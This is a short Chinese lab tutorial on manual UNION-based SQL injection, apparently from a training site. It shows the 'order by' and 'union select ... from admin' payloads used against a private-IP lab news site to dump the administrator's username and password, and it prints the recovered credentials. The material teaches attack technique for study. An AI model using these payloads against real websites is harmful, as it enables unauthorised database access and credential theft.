SQL注入原理-手工联合查询注入技术
【实验原理】首先,在链接后面添加语句
【order by 11(数字任意)】,
根据页面返回结果,来判断站点中的字段数目。然后,在链接后面添加语句
【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,
进行联合查询,来暴露可查询的字段编号。
最后,根据上一步得到的字段编号,添加语句
【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,
直接暴露管理员用户名和密码。
就以新闻雷池作为例子
随便点击一个链接【http://192.168.1.3:8008/onews.asp?id=45】,在后面添加语句【order by 11】,页面显示正常。
同样添加语句【order by 12】页面报错,所以此站字段长度为11
在连接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字2和3
在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。
管理员用户名【admin】和密码【bfpms】
上一篇下一篇